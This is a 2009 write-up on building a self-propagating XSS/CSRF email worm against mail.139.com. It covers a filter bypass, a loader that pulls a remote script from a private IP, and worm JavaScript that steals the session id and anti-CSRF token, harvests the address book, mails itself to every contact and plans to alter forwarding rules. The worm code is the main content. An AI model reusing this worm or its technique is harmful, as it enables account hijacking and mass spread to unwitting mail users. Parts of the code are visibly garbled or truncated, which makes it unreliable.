139 email worm compiling example
Author: [sh0wrun], [woyigui]
Date: 2009-09-09
Disclaimer: the vulnerability has been reported and repaired. Do not use it for illegal purposes.
Principle Analysis:
mail.139.com, which many of us use, is prone to XSS vulnerabilities because of lax filtering of mail bodies. Although a filter is applied to `style="xss:expression"`, it can be bypassed by inserting /**/, for example: [example missing from the page]. After /**/ is inserted, the script is executed in the IE browser.
It was also found that the send-mail function of mail.139.com is weak against CSRF: the mid value required to send mail can be obtained with Ajax, and the contact addresses in the address book can be read directly through JavaScript.
The three conditions for writing a CSRF worm are therefore met; the next step is to write the JavaScript code.
Cross-site code:
The function to be implemented here is to make the browser fetch a remote JS script and execute it:
Original:
Var ig = document. createElement ("script"); ig. src = "http: // 192.168.9.104/woyigui/139.js"; try {document. getElementsByTagName ("body") [0]. appendChild (ig);} catch (e) into document.doc umentElement. appendChild (document. createElement ("body"); document. getElementsByTagName ("body") [0]. appendChild (ig );}
This part is encoded as decimal character codes so that the filtered keywords are not replaced, and is then invoked:
This part of code needs to be placed in the mail body for transmission.
Script Function implementation:
The script implements the following steps:
1. Read the contact's email address through a script.
This information can be obtained through top.LinkManList.concat().
2. Obtain the sid value through the script.
This value can be obtained from window.top.location.href with a regular expression.
3. Get the mid value required for sending an email
After obtaining the sid value, open the "Write email" page from the script and read the mid value from it.
4. send an email
The send-mail function only checks the mid value, so once the correct mid has been obtained the script constructs the POST data and sends the mail to the contacts obtained in step 1.
5. Rewrite Email Forwarding rules and automatic reply rules
Construct a POST request with the correct sid.
Complete code:
var xssed = false; if (typeof XSSflag != "undefined"){ xssed = true; } var XSSflag = [ {name: "version", url: "1.0"}, ]; if ( xssed != true ) { var xmlhttp; //create XHR function createXMLHttp(){ try { xmlhttp = new XMLHttpRequest(); } catch (e) { var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP' ); var success = false; for (var i=0;i < XMLHTTP_IDS.length && !success; i++) { try { xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]); success = true; } catch (e) {} } if (!success) { throw new Error('Unable to create XMLHttpRequest.'); } } } function domid (dourl) { createXMLHttp(); var tmp = ""; xmlhttp.open("GET", dourl, false); xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(null); setTimeout( tmp = xmlhttp.responseText,500); return tmp; } function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){ createXMLHttp(); var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype= send.x&idOpType=&text="+ Content +"&destcgi= &funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year= &month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded;"); y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0"; xmlhttp.open("POST", doUrl, false); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(params); } function doMyAjax() { var strPer = '/coremail/cgi/attachfapps'; var tomail = '
;'; var subject = "test20"; var Content = ""; var account = ""; var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1"); var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid ); var mid="",text=""; text=tmpmid.split("\n"); for (var i=0;i < text.length; i++) { var patt=/name=\"mid\" value=\"/; if ( patt.test(text[i])) { mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1"); break; } } var mail_address=top.LinkManList.concat(); for (var i=0,len=mail_address.length;i
;"; } } try { startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject),
encodeURIComponent(Content), encodeURIComponent(account), mid, sid ); } catch (e) { alert("send data error!"); } } doMyAjax(); } |